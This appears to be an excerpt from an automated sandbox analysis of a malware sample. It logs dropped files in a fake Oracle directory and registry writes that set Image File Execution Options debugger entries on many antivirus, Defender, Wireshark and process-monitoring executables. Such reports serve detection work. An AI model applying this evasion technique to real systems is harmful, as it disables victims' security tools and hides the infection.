        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\msvcp140.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cplJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\nio.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cplJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\README.txt
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
        Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt

        Boot Survival

        barindex
        Creates a Image File Execution Options (IFEO) Debugger entry
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exeRegistry value created: svchost.exe
        Creates an undocumented autostart registry key
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mergecap.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mergecap.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Up.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Up.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Medic.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Medic.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuarScanner.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuarScanner.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuardUpdate.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuardUpdate.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\clamscan.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\clamscan.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cis.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cis.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FPAVServer.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FPAVServer.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVK.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVK.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GdBgInx64.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GdBgInx64.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GDScan.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GDScan.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVKWCtlx64.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVKWCtlx64.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVKTray.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVKTray.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\guardxkickoff_x64.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\guardxkickoff_x64.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7CrvSvc.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7CrvSvc.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7TSMain.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7TSMain.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7TSMngr.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7TSMngr.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nnf.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nnf.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nbrowser.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nbrowser.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nfservice.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nfservice.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NS.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NS.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\acs.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\acs.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSANHost.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSANHost.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BDSSVC.EXE debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BDSSVC.EXE debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SCANNER.EXE debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SCANNER.EXE debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ScSecSvc.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ScSecSvc.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PtSvcHost.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PtSvcHost.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mergecap.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Up.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Medic.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuarScanner.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuardUpdate.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\clamscan.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cis.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FPAVServer.exe debugger
